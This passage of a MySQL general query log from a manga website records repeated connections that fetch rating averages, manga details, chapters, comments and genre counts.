'316' order by created desc 330647770 Quit 330647771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330647771 Quit 330647772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330647772 Quit 330647773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330647773 Quit 330647774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330647774 Quit 330647775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330647775 Quit 330647776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330647776 Quit 330647777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330647777 Quit 330647778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330647778 Quit 330647779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330647779 Quit 330647780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330647780 Quit 330647781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330647781 Quit 330647782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330647782 Quit 330647783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330647783 Quit 330647784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330647784 Quit 330647785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330647785 Quit 330647786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330647786 Quit 330647787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330647787 Quit 330647788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330647788 Quit 330647789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330647789 Quit 330647790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330647790 Quit 330647791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330647791 Quit 330647792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330647792 Quit 330647793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330647793 Quit 330647794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647794 Quit 330647795 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'can-a-boy-and-girl-friendship-hold-up-no-it-cant' 330647795 Quit 330647796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647796 Query select * FROM chapters where manga_id = '202' order by id desc 330647796 Quit 330647797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647797 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '202' and m.active = 1 330647797 Quit 330647798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647798 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='202' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:28:52 330647798 Quit 330647799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647799 Query select * FROM comments where manga_id = '202' and parent_id is null order by created desc 330647799 Quit 330647800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647800 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '202' and m.active = 1 330647800 Quit 330647801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647801 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Romance%' OR m.genres like '%Shounen%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330647801 Quit 330647802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647802 Quit 330647803 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330647803 Quit 330647804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330647804 Quit 330647805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647805 Query select * FROM chapters where manga_id = '202' order by created desc limit 1 330647805 Quit 330647806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647806 Query select * FROM comments where parent_id = '793' 330647806 Quit 330647807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330647807 Quit 330647808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330647808 Quit 330647809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330647809 Quit 330647810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330647810 Quit 330647811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330647811 Quit 330647812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330647812 Quit 330647813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330647813 Quit 330647814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330647814 Quit 330647815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330647815 Quit 330647816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330647816 Quit 330647817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330647817 Quit 330647818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330647818 Quit 330647819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330647819 Quit 330647820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330647820 Quit 330647821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330647821 Quit 330647822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330647822 Quit 330647823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330647823 Quit 330647824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330647824 Quit 330647825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330647825 Quit 330647826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330647826 Quit 330647827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330647827 Quit 330647828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330647828 Quit 330647829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330647829 Quit 330647830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330647830 Quit 330647831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330647831 Quit 330647832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330647832 Quit 330647833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330647833 Quit 330647834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330647834 Quit 330647835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330647835 Quit 330647836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330647836 Quit 330647837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330647837 Quit 330647838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330647838 Quit 330647839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330647839 Quit 330647840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330647840 Quit 330647841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330647841 Quit 330647842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330647842 Quit 330647843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330647843 Quit 330647844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330647844 Quit 330647845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330647845 Quit 330647846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330647846 Quit 330647847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330647847 Quit 330647848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330647848 Quit 330647849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330647849 Quit 330647850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330647850 Quit 330647851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330647851 Quit 330647852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330647852 Quit 330647853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330647853 Quit 330647854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330647854 Quit 330647855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330647855 Quit 330647856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330647856 Quit 330647857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330647857 Quit 330647858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330647858 Quit 330647859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330647859 Quit 330647860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330647860 Quit 330647861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330647861 Quit 330647862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330647862 Quit 330647863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330647863 Quit 330647864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330647864 Quit 330647865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330647865 Quit 330647866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330647866 Quit 330647867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330647867 Quit 330647868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330647868 Quit 330647869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330647869 Quit 330647870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330647870 Quit 330647871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330647871 Quit 330647872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330647872 Quit 330647873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330647873 Quit 330647874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330647874 Quit 330647875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330647875 Quit 330647876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330647876 Quit 330647877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330647877 Quit 330647878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330647878 Quit 330647879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330647879 Quit 330647880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330647880 Quit 330647881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330647881 Quit 330647882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330647882 Quit 330647883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330647883 Quit 330647884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330647884 Quit 330647885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330647885 Quit 330647886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330647886 Quit 330647887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330647887 Quit 330647888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330647888 Quit 330647889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330647889 Quit 330647890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330647890 Quit 330647891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330647891 Quit 330647892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330647892 Quit 330647893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330647893 Quit 330647894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330647894 Quit 330647895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330647895 Quit 330647896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330647896 Quit 330647897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330647897 Quit 330647898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330647898 Quit 330647899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330647899 Quit 330647900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330647900 Quit 330647901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330647901 Quit 330647902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330647902 Quit 330647903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330647903 Quit 330647904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330647904 Quit 330647905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330647905 Quit 330647906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330647906 Quit 330647907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330647907 Quit 330647908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330647908 Quit 330647909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330647909 Quit 330647910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330647910 Quit 330647911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330647911 Quit 330647912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330647912 Quit 330647913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330647913 Quit 330647914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330647914 Quit 330647915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330647915 Quit 330647916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330647916 Quit 330647917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330647917 Quit 330647918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330647918 Quit 330647919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330647919 Quit 330647920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330647920 Quit 330647921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330647921 Quit 330647922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647922 Query select count(id) as total_rating, 